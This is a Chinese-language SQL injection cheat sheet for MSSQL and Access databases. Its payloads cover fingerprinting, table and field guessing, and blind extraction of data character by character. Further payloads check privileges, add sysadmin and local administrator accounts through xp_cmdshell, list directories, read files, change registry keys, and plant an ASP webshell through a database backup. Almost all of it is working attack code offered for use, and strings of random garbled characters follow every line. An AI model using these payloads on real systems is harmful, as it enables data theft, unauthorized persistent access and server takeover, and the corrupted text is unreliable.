1.判断是否有注入;and 1=1 ;and 1=2 P���s�<k�2
2.初步判断是否是mssql ;and user>0 ���z��:� �
+zXcTT[��V
3.注入参数是字符'and [查询条件] and ''=' D6"d\F�m�<
t<j_` %�`8
4.搜索时没过滤参数的'and [查询条件] and '%25'=' L}'^FqO[IW
�P]OUzI,��
5.判断数据库系统 KXp�bee��
YLS*uX�B&.
;and (select count(*) from sysobjects)>0 mssql $My~�s�N�8
t*dq*(�3"c
;and (select count(*) from msysobjects)>0 access �P�S=q):R|
�rQJ\Y3�.�
Z3=N=� xY]
V-E 77u6{0
6.猜数据库 ;and (select Count(*) from [数据库名])>0 7#Uzz"^���
Mv�p�|S�.�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 I�$�4>�_D
'Sesh'2
/�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �/�a9CqK�
C7f���*�Q[
9.(1)猜字段的ascii值(access) }%<_��>b�\
9XhH*tBn7(
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 M�%RH4%NZ0
F,Ve,�7k�h
(2)猜字段的ascii值(mssql) _Vf>>�t�uW
Uo�UQ�6I�j
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �TtH!5{$�s
>_���G'o�
10.测试权限结构(mssql) 2�E`mbT,v&
�7%[ ��YX
.}uri1k"@k
c�=QN!n�:
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- -@Urq>^v T
Qpj[�]c5��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��ReL���+V
T LF'7uf�q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Le{.B�@2-"
�atmW?�� Z
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .:GO�Kyr(~
g/\�cN(�X�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- !H�<%X~|�,
��q*C-DiV�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &FJr?hY�%
\=`�j�o$S
;and 1=(select IS_MEMBER('db_owner'));-- �P�=L@!F+s
]!N=Z
}LD
0�\s&;@xKk
|[>yJXxEL@
11.添加mssql和系统的帐户 �da_0{�;wR
}�B!�io�-}
;exec master.dbo.sp_addlogin username;-- @�A<~bod��
;exec master.dbo.sp_password null,username,password;-- �
�ls7P$qq
FC|�|6vJth
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N9y+P��sh
[hk/Rp7�{
;exec master.dbo.xp_cmdshell 'net user username password )[r=(6?�n�
~jm�I`�X/�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ao[yH�cA�s
[tEl��t4uG
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �^]~!:Ej0�
x8~�*�+ �j
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �k g �Rys�
��OdNcuiLa
Zm��7,��O8
KmM:V2@�A$
12.(1)遍历目录 ��NV@�$\�<
m�6]�6�!_�
;create table dirs(paths varchar(100), id int) JNJ�6HyCU
'�5~l{3Lw
;insert dirs exec master.dbo.xp_dirtree 'c:\' �wO�`G_!W9
'
I��!/I�
;and (select top 1 paths from dirs)>0 4HX;9HPHE<
��UI%4d3 �
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) K�{V.N<�/
z�MBGpqdP�
�x��25zk4-
e$JC��ak=
(2)遍历目录 z�r_L�
V_e
�&A`,��hF8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- o;#��8=q�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��3K/�'K[~
b�&
�-8/t�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �b�d�% M.,
0I�A'���5)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 L/I ]
NA!U
5J�1a�8RBR
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 +Ar4X�-A{y
[!8b�jc]c�
81!;W�t(?�
o�)x�&|�0_
13.mssql中的存储过程 }g��B^C3b6
;ceg:-�Zqo
xp_regenumvalues 注册表根键, 子键 ccp9nX��v�
$J��,$_O6�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 V0&7��MY�*
01uj�-!D$@
xp_regread 根键,子键,键值名 'Ffvd{�+:8
~l�{Qz0&��
;exec xp_regread W}}ZP]��;
!� hEZ�V&y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 nZ�c6
*jiz
m_BpY�9c]5
xp_regwrite 根键,子键, 值名, 值类型, 值 D� ]
�n|d+
U�>m{B�|H�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��a�p�gKC;
-1`�}|��t;
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 _�#�+l�?\u
*M0O&"��~j
xp_regdeletevalue 根键,子键,值名 `P-d. M6Oa
W�1t_�P&i
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 C�dPQhv)m�
�]���` A*7
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �UQ�7La 7"
n<�<arO"cv
?~#��[��cx
%g3QE:(2@q
14.mssql的backup创建webshell ]KXyi��;n2
NYs�<`6P:Y
use model o{n#f?�EA�
B,%KvL&xMX
create table cmd(str image); OL:hNbw'~T
!?Y�71:_�!
insert into cmd(str) values (''); B4+c3M\�$V
pv&�iJ7�RN
backup database model to disk='c:\l.asp'; 1�/qD5 *`Y
�8��ph1xQ'
j�VN=_Y}\�
d��(R8^v/L
15.mssql内置函数 -vk/�z+-^!
GK6CnSV8d�
;and (select @@version)>0 获得Windows的版本号 UX.rzYM�&T
Im��H�9 F\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ���0Q8iX)�
g}K/��ba'
;and (select user_name())>0 爆当前系统的连接用户 �hN�g�T/y8
!W0�JT#0��
;and (select db_name())>0 得到当前连接的数据库 7.g,&s%��q
\u�[5O�@v#
�.�*�>C�[^
X.,R%>O}`P
16.简洁的webshell l[m*cs�Dk"
H1KXAy`&�
use model �3DB�=� Xh
OT�6T�e�&�
create table cmd(str image); ��9.( �[,J
zcH"��Kh�&
insert into cmd(str) values (''); R%�)F9P�$o
^8�-,S[az�
backup database model to disk='g:\wwwtest\l.asp';
